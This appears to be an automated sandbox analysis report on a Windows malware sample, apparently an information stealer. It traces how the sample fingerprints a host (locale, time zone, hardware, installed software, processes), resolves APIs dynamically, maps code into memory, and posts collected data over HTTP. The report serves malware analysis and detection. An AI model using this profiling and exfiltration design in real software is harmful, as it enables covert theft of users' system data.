API calls 15210->15211 15212 151df0 15211->15212 15213 15a8a0 lstrcpy 15212->15213 15214 151df9 15213->15214 15875 157980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15214->15875 15217 15a9b0 4 API calls 15218 151e19 15217->15218 15219 15a8a0 lstrcpy 15218->15219 15220 151e22 15219->15220 15221 15a9b0 4 API calls 15220->15221 15222 151e41 15221->15222 15223 15a8a0 lstrcpy 15222->15223 15224 151e4a 15223->15224 15225 15a9b0 4 API calls 15224->15225 15226 151e6b 15225->15226 15227 15a8a0 lstrcpy 15226->15227 15228 151e74 15227->15228 15877 157a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15228->15877 15231 15a9b0 4 API calls 15232 151e94 15231->15232 15233 15a8a0 lstrcpy 15232->15233 15234 151e9d 15233->15234 15235 15a9b0 4 API calls 15234->15235 15236 151ebc 15235->15236 15237 15a8a0 lstrcpy 15236->15237 15238 151ec5 15237->15238 15239 15a9b0 4 API calls 15238->15239 15240 151ee5 15239->15240 15241 15a8a0 lstrcpy 15240->15241 15242 151eee 15241->15242 15880 157b00 GetUserDefaultLocaleName 15242->15880 15245 15a9b0 4 API calls 15246 151f0e 15245->15246 15247 15a8a0 lstrcpy 15246->15247 15248 151f17 15247->15248 15249 15a9b0 4 API calls 15248->15249 15250 151f36 15249->15250 15251 15a8a0 lstrcpy 15250->15251 15252 151f3f 15251->15252 15253 15a9b0 4 API calls 15252->15253 15254 151f60 15253->15254 15255 15a8a0 lstrcpy 15254->15255 15256 151f69 15255->15256 15884 157b90 15256->15884 15258 151f80 15259 15a920 3 API calls 15258->15259 15260 151f93 15259->15260 15261 15a8a0 lstrcpy 15260->15261 15262 151f9c 15261->15262 15263 15a9b0 4 API calls 15262->15263 15264 151fc6 15263->15264 15265 15a8a0 lstrcpy 15264->15265 15266 151fcf 15265->15266 15267 15a9b0 4 API calls 15266->15267 15268 151fef 15267->15268 15269 15a8a0 lstrcpy 15268->15269 15270 151ff8 15269->15270 15896 157d80 GetSystemPowerStatus 15270->15896 15273 15a9b0 4 API calls 15274 152018 15273->15274 15275 15a8a0 lstrcpy 15274->15275 15276 152021 15275->15276 15277 15a9b0 4 API calls 15276->15277 15278 152040 15277->15278 15279 15a8a0 lstrcpy 15278->15279 15280 152049 15279->15280 15281 15a9b0 4 API calls 15280->15281 15282 15206a 15281->15282 15283 15a8a0 lstrcpy 15282->15283 15284 152073 15283->15284 15285 15207e GetCurrentProcessId 15284->15285 15898 159470 OpenProcess 15285->15898 15288 15a920 3 API calls 15289 1520a4 15288->15289 15290 15a8a0 lstrcpy 15289->15290 15291 1520ad 15290->15291 15292 15a9b0 4 API calls 15291->15292 15293 1520d7 15292->15293 15294 15a8a0 lstrcpy 15293->15294 15295 1520e0 15294->15295 15296 15a9b0 4 API calls 15295->15296 15297 152100 15296->15297 15298 15a8a0 lstrcpy 15297->15298 15299 152109 15298->15299 15903 157e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15299->15903 15302 15a9b0 4 API calls 15303 152129 15302->15303 15304 15a8a0 lstrcpy 15303->15304 15305 152132 15304->15305 15306 15a9b0 4 API calls 15305->15306 15307 152151 15306->15307 15308 15a8a0 lstrcpy 15307->15308 15309 15215a 15308->15309 15310 15a9b0 4 API calls 15309->15310 15311 15217b 15310->15311 15312 15a8a0 lstrcpy 15311->15312 15313 152184 15312->15313 15907 157f60 15313->15907 15316 15a9b0 4 API calls 15317 1521a4 15316->15317 15318 15a8a0 lstrcpy 15317->15318 15319 1521ad 15318->15319 15320 15a9b0 4 API calls 15319->15320 15321 1521cc 15320->15321 15322 15a8a0 lstrcpy 15321->15322 15323 1521d5 15322->15323 15324 15a9b0 4 API calls 15323->15324 15325 1521f6 15324->15325 15326 15a8a0 lstrcpy 15325->15326 15327 1521ff 15326->15327 15920 157ed0 GetSystemInfo wsprintfA 15327->15920 15330 15a9b0 4 API calls 15331 15221f 15330->15331 15332 15a8a0 lstrcpy 15331->15332 15333 152228 15332->15333 15334 15a9b0 4 API calls 15333->15334 15335 152247 15334->15335 15336 15a8a0 lstrcpy 15335->15336 15337 152250 15336->15337 15338 15a9b0 4 API calls 15337->15338 15339 152270 15338->15339 15340 15a8a0 lstrcpy 15339->15340 15341 152279 15340->15341 15922 158100 GetProcessHeap RtlAllocateHeap 15341->15922 15344 15a9b0 4 API calls 15345 152299 15344->15345 15346 15a8a0 lstrcpy 15345->15346 15347 1522a2 15346->15347 15348 15a9b0 4 API calls 15347->15348 15349 1522c1 15348->15349 15350 15a8a0 lstrcpy 15349->15350 15351 1522ca 15350->15351 15352 15a9b0 4 API calls 15351->15352 15353 1522eb 15352->15353 15354 15a8a0 lstrcpy 15353->15354 15355 1522f4 15354->15355 15928 1587c0 15355->15928 15358 15a920 3 API calls 15359 15231e 15358->15359 15360 15a8a0 lstrcpy 15359->15360 15361 152327 15360->15361 15362 15a9b0 4 API calls 15361->15362 15363 152351 15362->15363 15364 15a8a0 lstrcpy 15363->15364 15365 15235a 15364->15365 15366 15a9b0 4 API calls 15365->15366 15367 15237a 15366->15367 15368 15a8a0 lstrcpy 15367->15368 15369 152383 15368->15369 15370 15a9b0 4 API calls 15369->15370 15371 1523a2 15370->15371 15372 15a8a0 lstrcpy 15371->15372 15373 1523ab 15372->15373 15933 1581f0 15373->15933 15375 1523c2 15376 15a920 3 API calls 15375->15376 15377 1523d5 15376->15377 15378 15a8a0 lstrcpy 15377->15378 15379 1523de 15378->15379 15380 15a9b0 4 API calls 15379->15380 15381 15240a 15380->15381 15382 15a8a0 lstrcpy 15381->15382 15383 152413 15382->15383 15384 15a9b0 4 API calls 15383->15384 15385 152432 15384->15385 15386 15a8a0 lstrcpy 15385->15386 15387 15243b 15386->15387 15388 15a9b0 4 API calls 15387->15388 15389 15245c 15388->15389 15390 15a8a0 lstrcpy 15389->15390 15391 152465 15390->15391 15392 15a9b0 4 API calls 15391->15392 15393 152484 15392->15393 15394 15a8a0 lstrcpy 15393->15394 15395 15248d 15394->15395 15396 15a9b0 4 API calls 15395->15396 15397 1524ae 15396->15397 15398 15a8a0 lstrcpy 15397->15398 15399 1524b7 15398->15399 15941 158320 15399->15941 15401 1524d3 15402 15a920 3 API calls 15401->15402 15403 1524e6 15402->15403 15404 15a8a0 lstrcpy 15403->15404 15405 1524ef 15404->15405 15406 15a9b0 4 API calls 15405->15406 15407 152519 15406->15407 15408 15a8a0 lstrcpy 15407->15408 15409 152522 15408->15409 15410 15a9b0 4 API calls 15409->15410 15411 152543 15410->15411 15412 15a8a0 lstrcpy 15411->15412 15413 15254c 15412->15413 15414 158320 17 API calls 15413->15414 15415 152568 15414->15415 15416 15a920 3 API calls 15415->15416 15417 15257b 15416->15417 15418 15a8a0 lstrcpy 15417->15418 15419 152584 15418->15419 15420 15a9b0 4 API calls 15419->15420 15421 1525ae 15420->15421 15422 15a8a0 lstrcpy 15421->15422 15423 1525b7 15422->15423 15424 15a9b0 4 API calls 15423->15424 15425 1525d6 15424->15425 15426 15a8a0 lstrcpy 15425->15426 15427 1525df 15426->15427 15428 15a9b0 4 API calls 15427->15428 15429 152600 15428->15429 15430 15a8a0 lstrcpy 15429->15430 15431 152609 15430->15431 15977 158680 15431->15977 15433 152620 15434 15a920 3 API calls 15433->15434 15435 152633 15434->15435 15436 15a8a0 lstrcpy 15435->15436 15437 15263c 15436->15437 15438 15265a lstrlen 15437->15438 15439 15266a 15438->15439 15440 15a740 lstrcpy 15439->15440 15441 15267c 15440->15441 15442 141590 lstrcpy 15441->15442 15443 15268d 15442->15443 15987 155190 15443->15987 15445 152699 15445->13877 16175 15aad0 15446->16175 15448 145009 InternetOpenUrlA 15449 145021 15448->15449 15450 1450a0 InternetCloseHandle InternetCloseHandle 15449->15450 15451 14502a InternetReadFile 15449->15451 15452 1450ec 15450->15452 15451->15449 15452->13881 16176 1498d0 15453->16176 15455 150759 15456 15077d 15455->15456 15457 150a38 15455->15457 15460 150799 StrCmpCA 15456->15460 15458 141590 lstrcpy 15457->15458 15459 150a49 15458->15459 16352 150250 15459->16352 15462 150843 15460->15462 15463 1507a8 15460->15463 15466 150865 StrCmpCA 15462->15466 15465 15a7a0 lstrcpy 15463->15465 15467 1507c3 15465->15467 15468 150874 15466->15468 15505 15096b 15466->15505 15469 141590 lstrcpy 15467->15469 15470 15a740 lstrcpy 15468->15470 15471 15080c 15469->15471 15473 150881 15470->15473 15474 15a7a0 lstrcpy 15471->15474 15472 15099c StrCmpCA 15475 1509ab 15472->15475 15494 150a2d 15472->15494 15476 15a9b0 4 API calls 15473->15476 15477 150823 15474->15477 15479 141590 lstrcpy 15475->15479 15480 1508ac 15476->15480 15478 15a7a0 lstrcpy 15477->15478 15481 15083e 15478->15481 15482 1509f4 15479->15482 15483 15a920 3 API calls 15480->15483 16179 14fb00 15481->16179 15485 15a7a0 lstrcpy 15482->15485 15486 1508b3 15483->15486 15487 150a0d 15485->15487 15488 15a9b0 4 API calls 15486->15488 15489 15a7a0 lstrcpy 15487->15489 15490 1508ba 15488->15490 15492 150a28 15489->15492 15491 15a8a0 lstrcpy 15490->15491 16295 150030 15492->16295 15494->13885 15505->15472 15827 15a7a0 lstrcpy 15826->15827 15828 141683 15827->15828 15829 15a7a0 lstrcpy 15828->15829 15830 141695 15829->15830 15831 15a7a0 lstrcpy 15830->15831 15832 1416a7 15831->15832 15833 15a7a0 lstrcpy 15832->15833 15834 1415a3 15833->15834 15834->14708 15836 1447c6 15835->15836 15837 144838 lstrlen 15836->15837 15861 15aad0 15837->15861 15839 144848 InternetCrackUrlA 15840 144867 15839->15840 15840->14785 15842 15a740 lstrcpy 15841->15842 15843 158b74 15842->15843 15844 15a740 lstrcpy 15843->15844 15845 158b82 GetSystemTime 15844->15845 15847 158b99 15845->15847 15846 15a7a0 lstrcpy 15848 158bfc 15846->15848 15847->15846 15848->14800 15850 15a931 15849->15850 15851 15a988 15850->15851 15854 15a968 lstrcpy lstrcat 15850->15854 15852 15a7a0 lstrcpy 15851->15852 15853 15a994 15852->15853 15853->14803 15854->15851 15855->14918 15857 149af9 LocalAlloc 15856->15857 15858 144eee 15856->15858 15857->15858 15859 149b14 CryptStringToBinaryA 15857->15859 15858->14806 15858->14808 15859->15858 15860 149b39 LocalFree 15859->15860 15860->15858 15861->15839 15862->14928 15863->15069 15864->15071 15865->15079 15994 1577a0 15866->15994 15869 1576c6 RegOpenKeyExA 15871 157704 RegCloseKey 15869->15871 15872 1576e7 RegQueryValueExA 15869->15872 15870 151c1e 15870->15161 15871->15870 15872->15871 15874 151c99 15873->15874 15874->15175 15876 151e09 15875->15876 15876->15217 15878 151e84 15877->15878 15879 157a9a wsprintfA 15877->15879 15878->15231 15879->15878 15881 157b4d 15880->15881 15882 151efe 15880->15882 16001 158d20 LocalAlloc CharToOemW 15881->16001 15882->15245 15885 15a740 lstrcpy 15884->15885 15886 157bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15885->15886 15893 157c25 15886->15893 15887 157c46 GetLocaleInfoA 15887->15893 15888 157d18 15889 157d1e LocalFree 15888->15889 15890 157d28 15888->15890 15889->15890 15892 15a7a0 lstrcpy 15890->15892 15891 15a9b0 lstrcpy lstrlen lstrcpy lstrcat 15891->15893 15894 157d37 15892->15894 15893->15887 15893->15888 15893->15891 15895 15a8a0 lstrcpy 15893->15895 15894->15258 15895->15893 15897 152008 15896->15897 15897->15273 15899 1594b5 15898->15899 15900 159493 GetModuleFileNameExA CloseHandle 15898->15900 15901 15a740 lstrcpy 15899->15901 15900->15899 15902 152091 15901->15902 15902->15288 15904 152119 15903->15904 15905 157e68 RegQueryValueExA 15903->15905 15904->15302 15906 157e8e RegCloseKey 15905->15906 15906->15904 15908 157fb9 GetLogicalProcessorInformationEx 15907->15908 15909 157fd8 GetLastError 15908->15909 15912 158029 15908->15912 15916 157fe3 15909->15916 15919 158022 15909->15919 15913 1589f0 2 API calls 15912->15913 15915 15807b 15913->15915 15914 1589f0 2 API calls 15917 152194 15914->15917 15918 158084 wsprintfA 15915->15918 15915->15919 15916->15908 15916->15917 16002 1589f0 15916->16002 16005 158a10 GetProcessHeap RtlAllocateHeap 15916->16005 15917->15316 15918->15917 15919->15914 15919->15917 15921 15220f 15920->15921 15921->15330 15923 1589b0 15922->15923 15924 15814d GlobalMemoryStatusEx 15923->15924 15927 158163 __aulldiv 15924->15927 15925 15819b wsprintfA 15926 152289 15925->15926 15926->15344 15927->15925 15929 1587fb GetProcessHeap RtlAllocateHeap wsprintfA 15928->15929 15931 15a740 lstrcpy 15929->15931 15932 15230b 15931->15932 15932->15358 15934 15a740 lstrcpy 15933->15934 15940 158229 15934->15940 15935 158263 15936 15a7a0 lstrcpy 15935->15936 15938 1582dc 15936->15938 15937 15a9b0 lstrcpy lstrlen lstrcpy lstrcat 15937->15940 15938->15375 15939 15a8a0 lstrcpy 15939->15940 15940->15935 15940->15937 15940->15939 15942 15a740 lstrcpy 15941->15942 15943 15835c RegOpenKeyExA 15942->15943 15944 1583d0 15943->15944 15945 1583ae 15943->15945 15947 158613 RegCloseKey 15944->15947 15948 1583f8 RegEnumKeyExA 15944->15948 15946 15a7a0 lstrcpy 15945->15946 15957 1583bd 15946->15957 15951 15a7a0 lstrcpy 15947->15951 15949 15843f wsprintfA RegOpenKeyExA 15948->15949 15950 15860e 15948->15950 15952 158485 RegCloseKey RegCloseKey 15949->15952 15953 1584c1 RegQueryValueExA 15949->15953 15950->15947 15951->15957 15954 15a7a0 lstrcpy 15952->15954 15955 158601 RegCloseKey 15953->15955 15956 1584fa lstrlen 15953->15956 15954->15957 15955->15950 15956->15955 15958 158510 15956->15958 15957->15401 15959 15a9b0 4 API calls 15958->15959 15960 158527 15959->15960 15961 15a8a0 lstrcpy 15960->15961 15962 158533 15961->15962 15963 15a9b0 4 API calls 15962->15963 15964 158557 15963->15964 15965 15a8a0 lstrcpy 15964->15965 15966 158563 15965->15966 15967 15856e RegQueryValueExA 15966->15967 15967->15955 15968 1585a3 15967->15968 15969 15a9b0 4 API calls 15968->15969 15970 1585ba 15969->15970 15971 15a8a0 lstrcpy 15970->15971 15972 1585c6 15971->15972 15973 15a9b0 4 API calls 15972->15973 15974 1585ea 15973->15974 15975 15a8a0 lstrcpy 15974->15975 15976 1585f6 15975->15976 15976->15955 15978 15a740 lstrcpy 15977->15978 15979 1586bc CreateToolhelp32Snapshot Process32First 15978->15979 15980 15875d CloseHandle 15979->15980 15981 1586e8 Process32Next 15979->15981 15982 15a7a0 lstrcpy 15980->15982 15981->15980 15986 1586fd 15981->15986 15985 158776 15982->15985 15983 15a9b0 lstrcpy lstrlen lstrcpy lstrcat 15983->15986 15984 15a8a0 lstrcpy 15984->15986 15985->15433 15986->15981 15986->15983 15986->15984 15988 15a7a0 lstrcpy 15987->15988 15989 1551b5 15988->15989 15990 141590 lstrcpy 15989->15990 15991 1551c6 15990->15991 16006 145100 15991->16006 15993 1551cf 15993->15445 15997 157720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15994->15997 15996 1576b9 15996->15869 15996->15870 15998 157765 RegQueryValueExA 15997->15998 15999 157780 RegCloseKey 15997->15999 15998->15999 16000 157793 15999->16000 16000->15996 16001->15882 16003 158a0c 16002->16003 16004 1589f9 GetProcessHeap HeapFree 16002->16004 16003->15916 16004->16003 16005->15916 16007 15a7a0 lstrcpy 16006->16007 16008 145119 16007->16008 16009 1447b0 2 API calls 16008->16009 16010 145125 16009->16010 16166 158ea0 16010->16166 16012 145184 16013 145192 lstrlen 16012->16013 16014 1451a5 16013->16014 16015 158ea0 4 API calls 16014->16015 16016 1451b6 16015->16016 16017 15a740 lstrcpy 16016->16017 16018 1451c9 16017->16018 16019 15a740 lstrcpy 16018->16019 16020 1451d6 16019->16020 16021 15a740 lstrcpy 16020->16021 16022 1451e3 16021->16022 16023 15a740 lstrcpy 16022->16023 16024 1451f0 16023->16024 16025 15a740 lstrcpy 16024->16025 16026 1451fd InternetOpenA StrCmpCA 16025->16026 16027 14522f 16026->16027 16028 1458c4 InternetCloseHandle 16027->16028 16029 158b60 3 API calls 16027->16029 16035 1458d9 ctype 16028->16035 16030 14524e 16029->16030 16031 15a920 3 API calls 16030->16031 16032 145261 16031->16032 16033 15a8a0 lstrcpy 16032->16033 16034 14526a 16033->16034 16036 15a9b0 4 API calls 16034->16036 16039 15a7a0 lstrcpy 16035->16039 16037 1452ab 16036->16037 16038 15a920 3 API calls 16037->16038 16040 1452b2 16038->16040 16047 145913 16039->16047 16041 15a9b0 4 API calls 16040->16041 16042 1452b9 16041->16042 16043 15a8a0 lstrcpy 16042->16043 16044 1452c2 16043->16044 16045 15a9b0 4 API calls 16044->16045 16046 145303 16045->16046 16048 15a920 3 API calls 16046->16048 16047->15993 16049 14530a 16048->16049 16050 15a8a0 lstrcpy 16049->16050 16051 145313 16050->16051 16052 145329 InternetConnectA 16051->16052 16052->16028 16053 145359 HttpOpenRequestA 16052->16053 16055 1458b7 InternetCloseHandle 16053->16055 16056 1453b7 16053->16056 16055->16028 16057 15a9b0 4 API calls 16056->16057 16058 1453cb 16057->16058 16059 15a8a0 lstrcpy 16058->16059 16060 1453d4 16059->16060 16061 15a920 3 API calls 16060->16061 16062 1453f2 16061->16062 16063 15a8a0 lstrcpy 16062->16063 16064 1453fb 16063->16064 16065 15a9b0 4 API calls 16064->16065 16066 14541a 16065->16066 16067 15a8a0 lstrcpy 16066->16067 16068 145423 16067->16068 16069 15a9b0 4 API calls 16068->16069 16070 145444 16069->16070 16071 15a8a0 lstrcpy 16070->16071 16072 14544d 16071->16072 16073 15a9b0 4 API calls 16072->16073 16074 14546e 16073->16074 16167 158ead CryptBinaryToStringA 16166->16167 16168 158ea9 16166->16168 16167->16168 16169 158ece GetProcessHeap RtlAllocateHeap 16167->16169 16168->16012 16169->16168 16170 158ef4 ctype 16169->16170 16171 158f05 CryptBinaryToStringA 16170->16171 16171->16168 16175->15448 16418 149880 16176->16418 16178 1498e1 16178->15455 16180 15a740 lstrcpy 16179->16180 16353 15a740 lstrcpy 16352->16353 16354 150266 16353->16354 16355 158de0 2 API calls 16354->16355 16356 15027b 16355->16356 16357 15a920 3 API calls 16356->16357 16358 15028b 16357->16358 16359 15a8a0 lstrcpy 16358->16359 16360 150294 16359->16360 16361 15a9b0 4 API calls 16360->16361 16419 14988d 16418->16419 16422 146fb0 16419->16422 16421 1498ad ctype 16421->16178 16425 146d40 16422->16425 16426 146d63 16425->16426 16427 146d59 16425->16427 16441 146530 16426->16441 16427->16421 16431 146dbe 16431->16427 16451 1469b0 16431->16451 16433 146e2a 16433->16427 16434 146ee6 VirtualFree 16433->16434 16435 146ef7 16433->16435 16434->16435 16436 146f26 FreeLibrary 16435->16436 16437 146f38 16435->16437 16440 146f41 16435->16440 16436->16435 16439 1589f0 2 API calls 16437->16439 16438 1589f0 2 API calls 16438->16427 16439->16440 16440->16427 16440->16438 16442 146542 16441->16442 16444 146549 16442->16444 16461 158a10 GetProcessHeap RtlAllocateHeap 16442->16461 16444->16427 16445 146660 16444->16445 16450 14668f VirtualAlloc 16445->16450 16447 146730 16448 146743 VirtualAlloc 16447->16448 16449 14673c 16447->16449 16448->16449 16449->16431 16450->16447 16450->16449 16452 1469c9 16451->16452 16455 1469d5 16451->16455 16453 146a09 LoadLibraryA 16452->16453 16452->16455 16454 146a32 16453->16454 16453->16455 16457 146ae0 16454->16457 16462 158a10 GetProcessHeap RtlAllocateHeap 16454->16462 16455->16433 16457->16455 16458 146ba8 GetProcAddress 16457->16458 16458->16455 16458->16457 16459 1589f0 2 API calls 16459->16457 16460 146a8b 16460->16455 16460->16459 16461->16444 16462->16460

                              Executed Functions

                              Function 00159860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 159860-159874 call 159750 663 159a93-159af2 LoadLibraryA * 5 660->663 664 15987a-159a8e call 159780 GetProcAddress * 21 660->664 666 159af4-159b08 GetProcAddress 663->666 667 159b0d-159b14 663->667 664->663 666->667 669 159b46-159b4d 667->669 670 159b16-159b41 GetProcAddress * 2 667->670 671 159b4f-159b63 GetProcAddress 669->671 672 159b68-159b6f 669->672 670->669 671->672 673 159b71-159b84 GetProcAddress 672->673 674 159b89-159b90 672->674 673->674 675 159bc1-159bc2 674->675 676 159b92-159bbc GetProcAddress * 2 674->676 676->675
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00DD0ED8), ref: 001598A1
                              • GetProcAddress.KERNEL32(75900000,00DD0F50), ref: 001598BA
                              • GetProcAddress.KERNEL32(75900000,00DD0E18), ref: 001598D2
                              • GetProcAddress.KERNEL32(75900000,00DD0DD0), ref: 001598EA
                              • GetProcAddress.KERNEL32(75900000,00DD0E30), ref: 00159903
                              • GetProcAddress.KERNEL32(75900000,00DD8FC0), ref: 0015991B
                              • GetProcAddress.KERNEL32(75900000,00DC5220), ref: 00159933
                              • GetProcAddress.KERNEL32(75900000,00DC52E0), ref: 0015994C
                              • GetProcAddress.KERNEL32(75900000,00DD0EA8), ref: 00159964
                              • GetProcAddress.KERNEL32(75900000,00DD0F08), ref: 0015997C
                              • GetProcAddress.KERNEL32(75900000,00DD0E60), ref: 00159995
                              • GetProcAddress.KERNEL32(75900000,00DD0E90), ref: 001599AD
                              • GetProcAddress.KERNEL32(75900000,00DC51C0), ref: 001599C5
                              • GetProcAddress.KERNEL32(75900000,00DD0C68), ref: 001599DE
                              • GetProcAddress.KERNEL32(75900000,00DD0F38), ref: 001599F6
                              • GetProcAddress.KERNEL32(75900000,00DC5260), ref: 00159A0E
                              • GetProcAddress.KERNEL32(75900000,00DD0C98), ref: 00159A27
                              • GetProcAddress.KERNEL32(75900000,00DD0FF8), ref: 00159A3F
                              • GetProcAddress.KERNEL32(75900000,00DC5540), ref: 00159A57
                              • GetProcAddress.KERNEL32(75900000,00DD0FB0), ref: 00159A70
                              • GetProcAddress.KERNEL32(75900000,00DC54E0), ref: 00159A88
                              • LoadLibraryA.KERNEL32(00DD0FC8,?,00156A00), ref: 00159A9A
                              • LoadLibraryA.KERNEL32(00DD0F80,?,00156A00), ref: 00159AAB
                              • LoadLibraryA.KERNEL32(00DD0FE0,?,00156A00), ref: 00159ABD
                              • LoadLibraryA.KERNEL32(00DD1010,?,00156A00), ref: 00159ACF
                              • LoadLibraryA.KERNEL32(00DD1028,?,00156A00), ref: 00159AE0
                              • GetProcAddress.KERNEL32(75070000,00DD0F98), ref: 00159B02
                              • GetProcAddress.KERNEL32(75FD0000,00DD0F68), ref: 00159B23
                              • GetProcAddress.KERNEL32(75FD0000,00DD95F0), ref: 00159B3B
                              • GetProcAddress.KERNEL32(75A50000,00DD94D0), ref: 00159B5D
                              • GetProcAddress.KERNEL32(74E50000,00DC5340), ref: 00159B7E
                              • GetProcAddress.KERNEL32(76E80000,00DD8FE0), ref: 00159B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00159BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00159BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: c1e48967a19d1bbc3a3aa2c9adb80de59c177e593508aa07d8a93974b74800da
                              • Instruction ID: 61ec46bc70fd187eb7aa73fec4475670e342b88e77a0048d36cf58a1f0208c48
                              • Opcode Fuzzy Hash: c1e48967a19d1bbc3a3aa2c9adb80de59c177e593508aa07d8a93974b74800da
                              • Instruction Fuzzy Hash: 12A15AB5500B009FF746EFA8ED889663BFDF78C701F14459BB61583224D739A842EB22
                              Function 001445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 1445c0-144695 RtlAllocateHeap 781 1446a0-1446a6 764->781 782 1446ac-14474a 781->782 783 14474f-1447a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0014460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0014479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144643
